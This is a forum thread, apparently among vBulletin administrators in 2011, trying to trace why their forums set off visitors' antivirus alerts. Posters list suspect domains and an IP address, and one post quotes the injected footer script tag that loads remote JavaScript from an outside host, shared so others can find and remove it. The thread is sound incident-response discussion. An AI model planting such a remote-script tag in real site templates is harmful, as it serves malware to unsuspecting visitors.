Announcement

Collapse
No announcement yet.

Forums triggering virus alerts

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Forums triggering virus alerts

    In the last week both Audiokarma.org and Videokarma.org have members posting about the forums setting off their virus protection. I can not find anywhere in the templates that something has been added. Possibly in a post, signature or a JS running somewhere. When they list the site that gets blocked by their software, I search the site but find nothing. For now I just add the offending IP to a .htaccess file on the server.

    sites talked about on the forums:
    w5e3ir.com
    nvsq5x.com


    Any clue how to go about finding how these are getting launched?

  • #2
    Originally posted by Wardsweb View Post
    In the last week both Audiokarma.org and Videokarma.org have members posting about the forums setting off their virus protection. I can not find anywhere in the templates that something has been added. Possibly in a post, signature or a JS running somewhere. When they list the site that gets blocked by their software, I search the site but find nothing. For now I just add the offending IP to a .htaccess file on the server.

    sites talked about on the forums:
    w5e3ir.com
    nvsq5x.com


    Any clue how to go about finding how these are getting launched?
    Boy, I've been getting this as well. Of course, everyone assumes it's our board that's doing it, but we're on a dedicated server and I've just checked it again.

    Posted this on our site, any thoughts from anyone would be welcome.

    Comment


    • #3
      Can you try re-downloading the ZIP file from the Members Area and re-upload all files (except install/install.php and includes/config.php.new) making sure you overwrite all files currently on your server.

      Does this resolve the problem?
      Vote for:

      - *Admin Settable Paid Subscription Reminder Timeframe*
      -
      *PM - Add ability to reply to originator only*
      - Add Admin ability to auto-subscribe users to specific channel(s)
      - Highlight the correct navigation tab when you are on a custom page
      - "Quick Route" Interface...
      - Allow to use custom icons for individual forums

      Comment


      • #4
        While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.

        Comment


        • #5
          Originally posted by Wardsweb View Post
          While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.
          You shouldn't have a problem with following Trevors suggestion unless you have modified vbulletin core files, if you haven't then nothing that you have done to your forum mods, templates, css or database will change - if you do have an issue it could potentially be scraping data from your database including emails, passwords and anything else thats stored.

          I know because i have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder which in turn gets ALL the information of that server and i mean evereything!
          Kind regards,
          Simon
          Microsoft Office Discussion

          Comment


          • #6
            Hi,

            Sounds like you have an iframe sql injection. It can be in your templates, but not always - it varies.

            Checking your source code may or may not find it either. Download Developer Tools for Firefox - then check Generated Source Code, this will show up any hidden source code that you normally will not see. Once you find which template it is, just hit Save on that template and it will remove and injected code.

            Re-uploading all vBulletin core files will not always correct this problem if you the person has hidden 'backdoor' files in your vBulletin, in which case check your Suspect Files for Base64 coding, or additional encoded javascript files, all of which will 'kill' your forum eventually.

            Leaving 'backdoor' files in vBulletin or any script, will not stop a malicious attack even if you are running the latest vBulletin with all patches. Blocking IP's in your .htaccess file will just cause your forum to respond slower after awhile, since each I.P will be checked before allowing access.

            Regards,

            Comment


            • #7
              A lot of forums suddenly started having issues yesterday. Our users suddenly have to hit their "back" button multiple times to move back one page. Seems that MS IE users are complaining exclusively. But I'm not positive. My users have pointed out issues with some file called www.alltagcloud.info/icons/index.html I network with a couple of dozen other VB forum admins, they started seeing this yesterday as well. They are thinking it's some Adsense ad possibly.
              Last edited by creativepart; Sun 18th Dec '11, 3:10pm.

              Comment


              • #8
                We found it on our system. Look for this code:
                Code:
                <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
                We found it in the Footer -- right after the
                Code:
                <form action="$vboptions[forumhome].php" method="get">

                Comment


                • #9
                  Originally posted by creativepart View Post
                  We found it on our system. Look for this code:
                  Code:
                  <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
                  We found it in the Footer -- right after the
                  Code:
                  <form action="$vboptions[forumhome].php" method="get">
                  Thanks - I looked but not found.

                  Comment


                  • #10
                    Many members have referenced the Toolkit and this IP address 178.17.163.189. The domain name may change but the IP is the same. Even with this IP set 178.17.163. in the .htaccess, some are still getting hit.

                    Even the hosting company is trying to find where this is being launched to no avail.
                    Attached Files

                    Comment


                    • #11
                      We have a few members grumbling about this as well, but thus far I haven't been able to find a thing. I've even tried accessing the site from inside a VM with virgin XP and 7 installs and no protection of any kind hoping to get some kind of infection, but haven't managed to infect myself.

                      I did look and couldn't find any reference to www.pageviewapi.com anywhere.
                      Host for ShopFloorTalk.com

                      Comment


                      • #12
                        When we had this issue I downloaded and installed Fiddler2 on my desktop computer. This little free program runs in a separate window and lists every file, function and script called while your page loads. I couldn't "see" any problems on my site until I loaded this and watched a page load. That's when I started seeing some script at alltagcloud.info loading with each page load. And, since Fiddler2 shows everything loading in order I could see that the script was being called near or in the footer which narrowed down the search. We were surprised to find the script was actually named something different than alltagcloud.info and I'd guess they have multiple versions of this with different names. Initially something named "pageviewapi.com" sounding fairly normal for the standard VB footer code.

                        You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.

                        Comment


                        • #13
                          Originally posted by Simon Lloyd View Post
                          You shouldn't have a problem with following Trevors suggestion unless you have modified vbulletin core files, if you haven't then nothing that you have done to your forum mods, templates, css or database will change - if you do have an issue it could potentially be scraping data from your database including emails, passwords and anything else thats stored.

                          I know because i have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder which in turn gets ALL the information of that server and i mean evereything!
                          We are on a dedicated server, so I had the server company replace all the templates from a backup. We backup the site daily and used one from 30 days ago to retreive the files. Still there are a couple posts after the reinstall of people being hit. Whatever it is, it is very nasty taking over their computers to the point of having to reformat or reinstall from a cloned drive or backup.

                          Comment


                          • #14
                            Originally posted by creativepart View Post
                            You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.
                            Been playing around with the forum with Fiddler2 and have yet to find anything. Could it be that these guys got infected somewhere else and it gets triggered when they visit a VB site?
                            Host for ShopFloorTalk.com

                            Comment


                            • #15
                              Our forum has been dealing with this since December 11. We have had 25-30 people over 16 days report issues. We are a mid-sized board with 20,000+ uniques per day. Out of 20k uniques per day, 1 or 2 of them report either getting a virus, or having their virus software notify them that a virus was blocked. That is .005% of our unique visitors reporting issues. Of course all of them claim it only happens when they visit our website.

                              We run on dedicated servers which have been check, rechecked and then checked again. We have compared our files with the maintenance tools as well as our templates. I have had a group of people running fiddler2 for days and none of us has seen anything.

                              I would love to figure this one out. I would like to know why it only bothers a small fraction of my users.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X